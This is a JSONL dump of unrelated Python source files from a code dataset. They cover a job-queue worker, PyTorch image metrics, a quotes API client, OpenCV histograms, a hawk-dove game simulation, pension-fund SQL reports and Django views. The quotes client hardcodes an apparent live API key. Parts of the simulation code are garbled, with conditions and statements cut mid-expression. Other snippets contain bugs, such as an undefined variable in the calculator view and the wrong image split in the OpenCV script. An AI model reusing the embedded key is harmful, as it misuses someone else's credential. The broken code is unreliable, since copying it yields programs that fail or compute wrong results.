+{"seq_id":"413489179","text":"#! /usr/bin/env python\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport traceback\nfrom builtins import object\nfrom builtins import range\nfrom builtins import str\n\nfrom past.utils import old_div\n\nfrom qs.rpcclient import ServerProxy\n\n\ndef short_err_msg():\n etype, val, tb = sys.exc_info()\n msg = []\n a = msg.append\n\n a(etype.__name__)\n a(\": \")\n a(str(val))\n\n file, lineno, name, line = traceback.extract_tb(tb)[-1]\n a(\" in function %s, file %s, line %s\" % (name, file, lineno))\n\n return \"\".join(msg)\n\n\nclass Worker(object):\n def __init__(self, proxy):\n self.proxy = proxy\n\n def dispatch(self, job):\n self.job = job\n self.jobid = job[\"jobid\"]\n self.priority = job[\"priority\"]\n self.jobid_prefix = None\n\n method = job[\"channel\"]\n\n m = getattr(self, \"rpc_\" + method, None)\n if m is None:\n raise RuntimeError(\"no such method %r\" % (method,))\n\n kwargs = job.get(\"payload\") or dict()\n tmp = {}\n for k, v in list(kwargs.items()):\n if isinstance(k, str):\n tmp[str(k)] = v\n else:\n tmp[k] = v\n\n return m(**tmp)\n\n def q_set_info(self, info):\n return self.proxy.q_set_info(jobid=self.jobid, info=info)\n\n def q_add(\n self, channel, payload=None, jobid=None, prefix=None, wait=False, timeout=None, ttl=None\n ):\n \"\"\"call q_add on proxy with the same priority as the current job\"\"\"\n if jobid is None and prefix is not None:\n jobid = \"%s::%s\" % (prefix, channel)\n\n return self.proxy.q_add(\n channel=channel,\n payload=payload,\n priority=self.priority,\n jobid=jobid,\n wait=wait,\n timeout=timeout,\n ttl=ttl,\n )\n\n def q_add_w(self, channel, payload=None, jobid=None, timeout=None):\n r = self.proxy.q_add(\n channel=channel,\n payload=payload,\n priority=self.priority,\n jobid=jobid,\n wait=True,\n timeout=timeout,\n )\n error = r.get(\"error\")\n if error is not None:\n raise RuntimeError(error)\n\n return r[\"result\"]\n\n\ndef main(\n commands, host=\"localhost\", port=None, numthreads=10, num_procs=0, numgreenlets=0, argv=None\n):\n if port is None:\n port = 14311\n\n channels = []\n skip_channels = []\n\n if argv:\n import getopt\n\n try:\n opts, args = getopt.getopt(\n argv, \"c:s:\", [\"host=\", \"port=\", \"numthreads=\", \"numprocs=\", \"channel=\", \"skip=\"]\n )\n except getopt.GetoptError as err:\n print(str(err))\n sys.exit(10)\n\n for o, a in opts:\n if o == \"--host\":\n host = a\n if o == \"--port\":\n port = int(a)\n if o == \"--numthreads\":\n numthreads = int(a)\n num_procs = 0\n if o == \"--numprocs\":\n num_procs = int(a)\n numthreads = 0\n if o == \"-c\" or o == \"--channel\":\n channels.append(a)\n if o == \"-s\" or o == \"--skip\":\n skip_channels.append(a)\n\n class WorkHandler(Worker, commands):\n pass\n\n available_channels = []\n for x in dir(WorkHandler):\n if x.startswith(\"rpc_\"):\n available_channels.append(x[len(\"rpc_\") :])\n available_channels.sort()\n\n if not channels:\n channels = available_channels\n else:\n for c in channels:\n assert c in available_channels, \"no such channel: %s\" % c\n\n for c in skip_channels:\n channels.remove(c)\n\n assert channels, \"no channels\"\n\n if num_procs:\n\n def check_parent():\n if os.getppid() == 1:\n print(\"parent died. 
exiting.\")\n os._exit(0)\n\n else:\n\n def check_parent():\n pass\n\n def handle_one_job(qs):\n sleeptime = 0.5\n\n while 1:\n try:\n job = qs.qpull(channels=channels)\n break\n except Exception as err:\n check_parent()\n print(\"Error while calling pulljob:\", str(err))\n time.sleep(sleeptime)\n check_parent()\n if sleeptime < 60:\n sleeptime *= 2\n\n check_parent()\n # print \"got job:\", job\n try:\n result = WorkHandler(qs).dispatch(job)\n except Exception as err:\n print(\"error:\", err)\n try:\n qs.qfinish(jobid=job[\"jobid\"], error=short_err_msg())\n traceback.print_exc()\n except:\n pass\n return\n\n try:\n qs.qfinish(jobid=job[\"jobid\"], result=result)\n except:\n pass\n\n def start_worker():\n qs = ServerProxy(host=host, port=port)\n while 1:\n handle_one_job(qs)\n\n print(\"pulling jobs from\", \"%s:%s\" % (host, port), \"for\", \", \".join(channels))\n\n def run_with_threads():\n import threading\n\n for i in range(numthreads):\n t = threading.Thread(target=start_worker)\n t.start()\n\n try:\n while True:\n time.sleep(2 ** 26)\n finally:\n os._exit(0)\n\n def run_with_procs():\n children = set()\n\n while 1:\n while len(children) < num_procs:\n try:\n pid = os.fork()\n except:\n print(\"failed to fork child\")\n time.sleep(1)\n continue\n\n if pid == 0:\n try:\n qs = ServerProxy(host=host, port=port)\n handle_one_job(qs)\n finally:\n os._exit(0)\n # print \"forked\", pid\n children.add(pid)\n\n try:\n pid, st = os.waitpid(-1, 0)\n except OSError:\n continue\n\n # print \"done\", pid\n try:\n children.remove(pid)\n except KeyError:\n pass\n\n def run_with_gevent():\n from qs.misc import CallInLoop\n\n import gevent.pool\n\n pool = gevent.pool.Pool()\n for i in range(numgreenlets):\n pool.spawn(CallInLoop(1.0, start_worker))\n\n pool.join()\n\n if numgreenlets > 0:\n run_with_gevent()\n elif num_procs > 0:\n run_with_procs()\n elif numthreads > 0:\n run_with_threads()\n else:\n assert 0, \"bad\"\n\n\nif __name__ == \"__main__\":\n\n class Commands(object):\n def rpc_divide(self, a, b):\n print(\"rpc_divide\", (a, b))\n return old_div(a, b)\n\n main(Commands, num_procs=2)\n","sub_path":"qs/slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"385166786","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\n\r\nclass ReshapeTo2D(nn.Module):\r\n\r\n def __init__(self):\r\n super(ReshapeTo2D, self).__init__()\r\n\r\n def forward(self,x):\r\n return torch.reshape(x, (x.shape[0], x.shape[1], x.shape[2]*x.shape[3]))\r\n\r\nclass ReshapeTo3D(nn.Module):\r\n def __init__(self):\r\n super(ReshapeTo3D, self).__init__()\r\n\r\n def forward(self,x):\r\n return torch.reshape(x, (x.shape[0], x.shape[1], int(np.sqrt(x.shape[2])), int(np.sqrt(x.shape[2]))))\r\n\r\nclass TransDimen(nn.Module):\r\n def __init__(self):\r\n super(TransDimen, self).__init__()\r\n\r\n def forward(self,x):\r\n #print(x.shape)\r\n return torch.Tensor.permute(x,[0,2,1])\r\n\r\ndef PSNR_GPU(im_true, im_fake):\r\n im_true *= 255\r\n im_fake *= 255\r\n im_true = im_true.round()\r\n im_fake = im_fake.round()\r\n data_range = 255\r\n esp = 1e-12\r\n C = im_true.size()[0]\r\n H = im_true.size()[1]\r\n W = im_true.size()[2]\r\n Itrue = im_true.clone()\r\n Ifake = im_fake.clone()\r\n mse = nn.MSELoss(reduce=False)\r\n err = mse(Itrue, Ifake).sum() / (C*H*W)\r\n psnr = 10. * np.log((data_range**2)/(err.data + esp)) / np.log(10.)\r\n return psnr\r\n\r\ndef SAM_GPU(im_true, im_fake):\r\n C = im_true.size()[0]\r\n H = im_true.size()[1]\r\n W = im_true.size()[2]\r\n esp = 1e-12\r\n Itrue = im_true.clone()#.resize_(C, H*W)\r\n Ifake = im_fake.clone()#.resize_(C, H*W)\r\n nom = torch.mul(Itrue, Ifake).sum(dim=0)#.resize_(H*W)\r\n denominator = Itrue.norm(p=2, dim=0, keepdim=True).clamp(min=esp) * \\\r\n Ifake.norm(p=2, dim=0, keepdim=True).clamp(min=esp)\r\n denominator = denominator.squeeze()\r\n sam = torch.div(nom, denominator).acos()\r\n sam[sam != sam] = 0\r\n sam_sum = torch.sum(sam) / (H * W) / np.pi * 180\r\n return sam_sum\r\n\r\n\r\nclass L_Dspec(nn.Module):\r\n def __init__(self,in_channel,out_channel,P_init):\r\n super(L_Dspec, self).__init__()\r\n self.in_channle = in_channel\r\n self.out_channel = out_channel\r\n self.P = nn.Parameter(P_init)\r\n\r\n def forward(self,input):\r\n S = input.shape\r\n out = torch.reshape(input,[S[0],S[1],S[2]*S[3]])\r\n out = torch.matmul(self.P,out)\r\n\r\n return torch.reshape(out,[S[0],self.out_channel,S[2],S[3]])\r\n\r\nclass Apply(nn.Module):\r\n def __init__(self, what, dim, *args):\r\n super(Apply, self).__init__()\r\n self.dim = dim\r\n self.what = what\r\n\r\n def forward(self, input):\r\n inputs = []\r\n for i in range(input.size(self.dim)):\r\n inputs.append(self.what(input.narrow(self.dim, i, 1)))\r\n return torch.cat(inputs, dim=self.dim)\r\n\r\n def __len__(self):\r\n return len(self._modules)\r\n\r\n\r\nclass FineNet_SelfAtt(nn.Module):\r\n\r\n def __init__(self):\r\n super(FineNet_SelfAtt, self).__init__()\r\n self.Conv1 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv2 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv3 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv4 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Conv5 = nn.Conv2d(31, 31, 3, 1, 1)\r\n self.Relu = nn.ReLU()\r\n self.Sig = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n out = self.Conv1(x)\r\n out = self.Conv2(self.Relu(out))\r\n out = self.Conv3(self.Relu(out))\r\n\r\n Z = self.Conv5(self.Relu(out))\r\n M = self.Sig(self.Conv4(self.Relu(out)))\r\n\r\n out = M*out + (1-M)*Z\r\n\r\n return out + x\r\n\r\n\r\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"423174274","text":"import requests\n\nnumber_of_movies = '3'\nurl = \"https://andruxnet-random-famous-quotes.p.mashape.com/?cat=movies&count=\" + number_of_movies\nmashape_key = \"VCQdmOJHQ2mshXFWvnEmgk3lbpnLp1iYGpbjsn9nkUM6negqqw\"\n\nresponse = requests.post(url,\n headers={\n \"X-Mashape-Key\": mashape_key,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"\n }\n)\n\njson_data = response.json()\nfor movies in json_data:\n\tprint(movies['quote'])\n\tprint('\\t-',movies['author'])","sub_path":"quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"229072128","text":"import cv2;\r\nimport numpy as np \r\n\r\ndef calcAndDrawHist(image, color): \r\n hist= cv2.calcHist([image], [0], None, [256], [0.0,255.0]) \r\n minVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc(hist) \r\n histImg = np.zeros([256,256,3], np.uint8) \r\n hpt = int(0.9* 256); \r\n \r\n for h in range(256): \r\n intensity = int(hist[h]*hpt/maxVal) \r\n cv2.line(histImg,(h,256), (h,256-intensity), color) \r\n \r\n return histImg; \r\n\r\n\r\n\r\nimg = cv2.imread('D:\\\\Freddy\\\\vision\\\\mp1a.jpg')\r\nimghsv = cv2.cvtColor(img, cv2.COLOR_BGR2YCR_CB)\r\nY, Cb, Cr= cv2.split(img)\r\n\t\r\nhistImgY = calcAndDrawHist(Y, [255, 0, 0]) \r\nhistImgCr = calcAndDrawHist(Cr, [0, 255, 0]) \r\nhistImgCb = calcAndDrawHist(Cb, [0, 0, 255]) \r\n\r\nout = cv2.cvtColor(imghsv, cv2.COLOR_YCR_CB2BGR)\r\n\r\ncv2.imshow(\"histImgY\", histImgY) \r\ncv2.imshow(\"histImgCb\", histImgCb) \r\ncv2.imshow(\"histImgCr\", histImgCr) \r\ncv2.imshow(\"Image\", out);\r\ncv2.waitKey(0);\r\n","sub_path":"YCbCr.py","file_name":"YCbCr.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"166977228","text":"from sympy import symbols, solve\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pylab\nfrom matplotlib import cm#\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport seaborn\nimport math\nimport random\nfrom random import randint\n\n\nN=2\n\namat=[]\nsolutions=[]\narange=121\nastep=0.05\n\n \n \na=-astep\n \n \nfor j in range(arange):\n \n a=a+astep\n amat.append(a)\n \n x = symbols('x', real=True, nonnegative=True)\n expr = (a/N)*(x**N) - (a/N)*x + x*((x-1)**2)*(N-1)\n \n solution=solve(expr)\n\n if len(solution)==3:\n solutions.append(solution[1])\n \n elif j==0:\n solutions.append(1)\n \n else:\n solutions.append(0)\n \n \n\na = list(range(0,arange))\na[:] = [x * astep for x in a]\n\n \nX=a\nY = solutions\n\nplt.plot(X, Y, color='g', label='Stable')\n\n\none=[]\nfor i in range(len(X)):\n one.append(1)\n \nplt.plot(X, one, color='r')\n\n \nplt.plot([0,min(N*(N-1),(arange-1)*astep)], [0,0], color='r', label='Unstable')\nplt.xlabel('\\u03BB')\nplt.ylabel('z')\nplt.legend()\n\n\nzmat=[]\nlmat=[]\n\nfor p in range(100):\n\n print(p)\n population=[]\n G=random.randint(1,6)\n C=random.randint(1,10)\n Time=10\n #population_size=10000\n population=([0]*50)+([1]*50)\n\n population_size=len(population)\n\n #for i in range(population_size):\n #population.append(randint(0,1))\n\n timearray=[]\n hawkpopulation=[]\n dovepopulation=[]\n\n\n for k in range(Time):\n population_size=len(population)\n HPayoff=0\n DPayoff=0\n for i in range(math.ceil(population_size/N)):\n game=[]\n for j in range(N):\n game.append(population[randint(0,population_size-1)])\n if game.count(1)==1:\n HPayoff=HPayoff + G\n if game.count(1)==0:\n DPayoff=DPayoff + G\n if game.count(1)>1:\n HPayoff=HPayoff + G-((game.count(1)-1)*game.count(1)*C)\n \n \n \n timearray.append(k)\n hawkpopulation.append(population.count(1))\n dovepopulation.append(population.count(0)) \n \n if DPayoff>0:\n for i in range(DPayoff):\n population.append(0)\n else:\n if -DPayoff0:\n for i in range(HPayoff):\n population.append(1)\n else:\n if -HPayoff0:\n Input=input('Please input your number(END by input end):')\n if Input=='end':\n e=-1 \n else:\n Input=int(Input)\n a.append(Input)\nprint('There are numbers what you input:')\nprint(a)\nchoose_big1(a) \n\n","sub_path":"testfunction1.py","file_name":"testfunction1.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"228132141","text":"import os \nimport numpy as np \nimport pandas as pd\nimport seaborn as sns \nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\ndef analyze(df):\n #Pairplot\n '''\n boolean=df['gsw']=='p1/gsw10'\n for p in range(2,15):\n boolean+=(df['gsw']=='p'+str(p)+'/gsw10')\n df=df[boolean]\n '''\n\n df['Sz']=np.zeros(df.shape[0])\n df['Sz'][df['path']=='4']=2\n df['Sz'][df['path']=='5']=2\n df['Sz'][df['path']=='6']=2\n df['Sz'][df['path']=='7']=4\n df['Sz'][df['path']=='8']=4\n df['Sz'][df['path']=='9']=4\n ind=np.where(pd.to_numeric(df['path'])<10)[0]\n df=df.iloc[ind]\n #print(list(df))\n #sns.pairplot(df,vars=['energy','sigTd','sigU','sigNps','sigNd'],hue='Sz',palette=sns.color_palette(\"husl\", 4))\n #sns.pairplot(df,vars=['energy','sigTd','sigU','sigNps'],hue='Sz',palette=sns.color_palette(\"husl\", 4))\n #plt.savefig('plots/vmc_pairplot.pdf',bbox_inches='tight')\n #plt.close()\n #plt.show()\n #exit(0)\n\n #Fit\n y=df['energy']\n X=df[['sigTd','sigU']]\n X=sm.add_constant(X)\n ols=sm.OLS(y,X).fit()\n print(ols.summary())\n df['pred']=ols.predict(X)\n df['resid']=df['energy']-df['pred']\n #df=df[df['Sz']==4]\n sns.pairplot(df,vars=['energy','pred','resid','sigNps'],hue='path',palette=sns.color_palette(\"husl\", 3))\n plt.show()\n exit(0)\n '''\n for p in np.arange(1,15):\n d=df[df['path']==str(p)]\n plt.errorbar(d['pred'],d['energy'],yerr=d['energy_err'],fmt='o',label='path '+str(p))\n plt.plot(df['energy'],df['energy'],'g-')\n plt.ylabel('energy (eV)')\n plt.xlabel('pred (eV)')\n plt.legend(loc='best')\n #plt.savefig('plots/vmc_pred_Td.pdf',bbox_inches='tight')\n plt.show()\n exit(0)\n '''\n \n '''\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n #Values with errorbars\n f=df.values\n fx=f[:,3] #sigTd\n fy=f[:,4] #sigU\n fz=f[:,0] #energy\n zerror=f[:,1] #energy_err\n indSz0=18\n\n ax.plot([fx[0]], [fy[0]], [fz[0]], \"bo\",label='Sz=0')\n ax.plot([fx[indSz0]], [fy[indSz0]], [fz[indSz0]], \"go\",label='Sz=2')\n for i in np.arange(indSz0):\n ax.plot([fx[i]], [fy[i]], [fz[i]], \"bo\")\n ax.plot([fx[i], fx[i]], [fy[i], fy[i]], [fz[i]+zerror[i], fz[i]-zerror[i]], \"b_\")\n for i in np.arange(indSz0,len(fx)):\n ax.plot([fx[i]], [fy[i]], [fz[i]], \"go\")\n ax.plot([fx[i], fx[i]], [fy[i], fy[i]], [fz[i]+zerror[i], fz[i]-zerror[i]], \"g_\")\n\n #Plane!\n gridx=np.linspace(min(fx),max(fx),100)\n gridy=np.linspace(min(fy),max(fy),100)\n xv,yv=np.meshgrid(gridx,gridy)\n zv=ols.params[0] + ols.params[1]*xv + ols.params[2]*yv \n ax.plot_surface(xv,yv,zv,cmap=plt.cm.coolwarm)\n\n ax.set_xlabel('sigTd')\n ax.set_ylabel('sigU')\n ax.set_zlabel('E (eV)')\n plt.legend(loc='best')\n plt.show()\n '''\nif __name__=='__main__':\n df=np.load('p_gosling.pickle')\n analyze(df)\n","sub_path":"undoped/NEW/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"147237991","text":"class fblualib(CmakeWig):\n\tgit_uri = 'https://github.com/facebook/fblualib'\n\tworking_directory = 'fblualib'\n\tdependencies = ['folly', 'glog', 'torch', 'thpp', 'fbthrift', 'libedit']\n\t\n\tdef luarocks_make(self, path):\n\t\tsplitted = path.split('/')\n\t\twig = LuarocksWig(splitted[0], os.path.join(*splitted[1:]))\n\t\twig.make_flags = self.make_flags\n\t\treturn '( cd \"%s\"; %s )' % (splitted[0], '; '.join(wig.gen_make_snippet()))\n\n\tdef setup(self):\n\t\t#self.require('deb-libmatio-dev') \n\t\t#self.require('deb-libpython-dev')\n\t\t#self.require('deb-python-numpy')\n\t\tworkaround_dir = 'fblualib_rockspec_workaround'\n\t\t#self.after_make += [S.CD_PARENT, S.export(S.DESTDIR, workaround_dir)]\n\t\tself.after_make += [S.CD_PARENT] + map(lambda x: self.luarocks_make('%s/rockspec/fb%s-0.1-1.rockspec' % (x, x)), [\n\t\t\t'util',\n\t\t\t'luaunit',\n\t\t\t'complex',\n\t\t\t'ffivector',\n\t\t\t'editline',\n\t\t\t'trepl',\n\t\t\t'debugger',\n\t\t\t#'mattorch',\n\t\t\t#'python',\n\t\t\t#'thrift'\n\t\t])\n\n\t\t#self.after_install += [\n\t\t#\t'''LUA_LIB_DIR=\"$PREFIX/lib/lua/5.1\"''',\n\t\t#\t'''LUA_MODULE_DIR=\"$PREFIX/share/lua/5.1\"''',\n\t\t#\t'''CMAKE_INSTALL_PREFIX_ASSUMED=\"/usr/local/lib\"''',\n\t\t#\t'''AWK_SCRIPT='{ system(\"mkdir -p \\\\\"$(dirname \\\\\"\" TARGET $NF \"\\\\\")\\\\\" && cp \\\\\"\" $0 \"\\\\\" \\\\\"\" TARGET $NF \"\\\\\"\") }' ''',\n\t\t#\t'''find .. | grep \"build/%s.*\\.lua$\" | awk -F\"/lua/\" -v TARGET=\"$LUA_MODULE_DIR/\" \"$AWK_SCRIPT\"''' % workaround_dir,\n\t\t#\t'''find .. | grep \"build/%s.*\\.so$\" | awk -F\"$CMAKE_INSTALL_PREFIX_ASSUMED/\" -v TARGET=\"$LUA_LIB_DIR/\" \"$AWK_SCRIPT\"''' % workaround_dir,\n\t\t#\t#'''sed -i s:\\\\'$CMAKE_INSTALL_PREFIX_ASSUMED/fblualib/util/libcpp.so\\\\':\\\\'$LUA_LIB_DIR/fblualib/util/libcpp.so\\\\':g \"$LUA_MODULE_DIR/fb/util/_config.lua\"'''\n\t\t#]\n\n","sub_path":"wigs/fblualib.py","file_name":"fblualib.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"426124572","text":"import sys\r\nsys.path.append('c:/dafapp/dplk07/script_modules')\r\nimport moduleapi\r\n\r\ndef get_distribusi_hi(config, parameter, returns):\r\n rec = parameter.FirstRecord\r\n monthBaghas = rec.monthBaghas\r\n yearBaghas = rec.yearBaghas\r\n monthInvestasi = rec.monthPiutang\r\n yearInvestasi = rec.yearPiutang\r\n \r\n status = returns.CreateValues(\r\n ['Is_Err', 0],\r\n ['Err_Message', ''], \r\n ['inv_deposito',0.0],\r\n ['inv_sukuk',0.0],\r\n ['inv_reksadana',0.0],\r\n ['hi_deposito',0.0],\r\n ['hi_sukuk',0.0],\r\n ['hi_reksadana',0.0],\r\n ['tgl_baghas',''],\r\n ['tgl_investasi','']\r\n )\r\n ds_danapaket = returns.AddNewDatasetEx('danapaket', \\\r\n 'paket:string;nominal:float;')\r\n\r\n try:\r\n lastday_baghas = moduleapi.GetLastDayOfMonth(monthBaghas, yearBaghas)\r\n lastday_inv = moduleapi.GetLastDayOfMonth(monthInvestasi, yearInvestasi)\r\n tgl_baghas = '%s/%s/%s' % (str(monthBaghas),str(lastday_baghas),str(yearBaghas))\r\n tgl_investasi = '%s/%s/%s' % (str(monthInvestasi),str(lastday_inv),str(yearInvestasi))\r\n status.tgl_baghas = tgl_baghas; status.tgl_investasi = tgl_investasi\r\n strtgl_baghas = '%s-%s-%s 23:59:59.000' % (yearBaghas, monthBaghas, lastday_baghas)\r\n strtgl_investasi = '%s-%s-%s 23:59:59.000' % (yearInvestasi, monthInvestasi, lastday_inv)\r\n \r\n FillDanaPerPaket(config, strtgl_baghas, strtgl_investasi, ds_danapaket)\r\n status.inv_deposito = GetNominalInv(config, \"'A'\", 'Deposito', strtgl_investasi)\r\n status.inv_sukuk = GetNominalInv(config, \"'A','D'\", 'Obligasi', strtgl_investasi)\r\n status.inv_reksadana = GetNominalInv(config, \"'A','D'\", 'Reksadana', strtgl_investasi)\r\n status.hi_deposito = GetHasilInv(config, 'D', strtgl_investasi, strtgl_baghas)\r\n status.hi_sukuk = GetHasilInv(config, 'O', strtgl_investasi, strtgl_baghas)\r\n status.hi_reksadana = GetHasilInv(config, 'R', strtgl_investasi, strtgl_baghas)\r\n except:\r\n status.Is_Err = 1\r\n status.Err_Message = str(sys.exc_info()[1])\r\n\r\n return 1\r\n\r\ndef FillDanaPerPaket(config, strtgl_baghas, strtgl_investasi, ds_danapaket):\r\n dictDanaTutup = BuildSQLDanaTutup(config, strtgl_baghas, strtgl_investasi)\r\n rSQL = BuildSQLDanaPaket(config, strtgl_investasi)\r\n while not rSQL.Eof:\r\n rec = ds_danapaket.AddRecord()\r\n rec.paket = rSQL.paket\r\n if dictDanaTutup.has_key(rSQL.paket):\r\n dana_tutup = dictDanaTutup[rSQL.paket]\r\n else:\r\n dana_tutup = 0.0\r\n rec.nominal = rSQL.nominal + dana_tutup \r\n rSQL.Next()\r\n \r\ndef BuildSQLDanaPaket(config, tgl_investasi):\r\n sSQL = \"SELECT r.kode_paket_investasi as paket,\\\r\n sum(mutasi_iuran_pst) + sum(mutasi_iuran_pk) +\\\r\n sum(mutasi_pengembangan) + sum(mutasi_peralihan) as nominal\\\r\n FROM transaksidplk t, rekeningdplk r \\\r\n WHERE \\\r\n t.no_peserta = r.no_peserta\\\r\n and status_dplk = 'A'\\\r\n and isCommitted = 'T'\\\r\n and tgl_transaksi <= '%s'\\\r\n GROUP BY r.kode_paket_investasi\\\r\n ORDER BY r.kode_paket_investasi\" % (tgl_investasi)\r\n config.SendDebugMsg(sSQL)\r\n \r\n rSQL = config.CreateSQL(sSQL).RawResult\r\n \t\r\n return rSQL\r\n\r\ndef BuildSQLDanaTutup(config, strtgl_baghas, strtgl_investasi):\r\n dictDanaTutup = {}\r\n #sSQL = \"select r.kode_paket_investasi, sum(mutasi_iuran_pk) + sum(mutasi_iuran_pst) +\\\r\n # sum(mutasi_pengembangan) + sum(mutasi_peralihan) as dana\\\r\n # from transaksidplk t, rekeningdplk r\\\r\n # where \\\r\n # t.no_peserta = r.no_peserta\\\r\n # and r.no_peserta in\\\r\n # (\\\r\n # \tselect t.no_peserta\\\r\n # \tfrom transaksidplk t, 
nasabahdplk n\\\r\n # \twhere \\\r\n # \tt.no_peserta = n.no_peserta\\\r\n # \tand tgl_registrasi <= '%s'\\\r\n # \tand kode_jenis_transaksi = 'J'\\\r\n # \tand tgl_transaksi > '%s'\\\r\n # \tand tgl_transaksi <= '%s'\\\r\n # )\\\r\n # group by r.kode_paket_investasi\\\r\n # order by r.kode_paket_investasi\" % (strtgl_investasi, strtgl_investasi, strtgl_baghas)\r\n #config.SendDebugMsg(sSQL)\r\n\r\n\r\n sSQL = \"select r.kode_paket_investasi, sum(mutasi_iuran_pk) + sum(mutasi_iuran_pst) +\\\r\n sum(mutasi_pengembangan) + sum(mutasi_peralihan) as dana\\\r\n from transaksidplk t, rekeningdplk r\\\r\n where \\\r\n t.no_peserta = r.no_peserta\\\r\n and t.iscommitted = 'T'\\\r\n and t.tgl_transaksi < '%s'\\\r\n and r.no_peserta in\\\r\n (\\\r\n \tselect t.no_peserta\\\r\n \tfrom transaksidplk t, nasabahdplk n\\\r\n \twhere \\\r\n \tt.no_peserta = n.no_peserta\\\r\n \tand tgl_registrasi <= '%s'\\\r\n \tand kode_jenis_transaksi = 'J'\\\r\n \tand t.iscommitted = 'T'\\\r\n \tand tgl_transaksi > '%s'\\\r\n )\\\r\n group by r.kode_paket_investasi\\\r\n order by r.kode_paket_investasi\" % (strtgl_investasi, strtgl_investasi, strtgl_investasi)\r\n config.SendDebugMsg(sSQL)\r\n\r\n\r\n \r\n rSQL = config.CreateSQL(sSQL).RawResult\r\n rSQL.First()\r\n while not rSQL.Eof:\r\n dictDanaTutup[rSQL.kode_paket_investasi] = rSQL.dana or 0.0\r\n rSQL.Next()\r\n \t\r\n return dictDanaTutup\r\n \r\ndef GetHasilInv(config, jenisinv, strtgl_investasi, strtgl_baghas):\r\n strSQL = \"\\\r\n select sum(mutasi_kredit) - sum(mutasi_debet) as hasil_investasi \\\r\n from TransaksiInvestasi ti, Investasi i \\\r\n where clsfTransaksiInvestasi = 'C' \\\r\n and tgl_transaksi > '%s' \\\r\n and tgl_transaksi <= '%s' \\\r\n and i.id_investasi = ti.id_investasi \\\r\n and i.kode_jns_investasi = '%s'\"\\\r\n % (strtgl_investasi, strtgl_baghas, jenisinv)\r\n \r\n config.SendDebugMsg(strSQL)\r\n res = config.CreateSQL(strSQL).RawResult\r\n \r\n return res.hasil_investasi or 0.0 \r\n\r\ndef GetNominalInv(config, cls, jenisinv, strSQLEndDate):\r\n strSQL = \"\\\r\n select \\\r\n \tsum(mutasi_debet) - sum(mutasi_kredit) as nominal_investasi \\\r\n from TransaksiInvestasi t, %s d \\\r\n where isCommitted = 'T' \\\r\n \tand clsfTransaksiInvestasi in (%s) \\\r\n \tand t.id_investasi = d.id_investasi \\\r\n \tand tgl_transaksi <= '%s'\"\\\r\n % (jenisinv, cls, strSQLEndDate)\r\n config.SendDebugMsg(strSQL)\r\n res = config.CreateSQL(strSQL).RawResult\r\n \r\n return res.nominal_investasi or 0.0 \r\n\r\n","sub_path":"scripts/investasi/report/reportinv-2011-02-02.py","file_name":"reportinv-2011-02-02.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"99162327","text":"from django.conf.urls import url, include\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Snippets API\",\n default_version='v1',\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\n\nurlpatterns = [\n url('api/analytics/', include('analytics.urls')),\n url('api/users/', include('users.urls')),\n url(r'^$', schema_view.with_ui('swagger', cache_timeout=0)),\n]\n","sub_path":"app/perx/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"249346913","text":"from django.shortcuts import render\n\nfrom .forms import CalcForm\n\n\ndef calc_view(request):\n template = \"app/calc.html\"\n if request.method == 'GET':\n form = CalcForm(request.GET)\n if form.is_valid():\n initial_fee = int(request.GET.get('initial_fee'))\n rate = int(request.GET.get('rate'))/100\n months_count = int(request.GET.get('months_count'))\n result = (initial_fee + initial_fee * rate) / months_count\n common_result = (initial_fee + initial_fee * rate)\n\n else:\n form = CalcForm\n\n context = {\n 'form': form,\n 'result': result,\n 'common_result': common_result\n }\n return render(request, template, context)\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
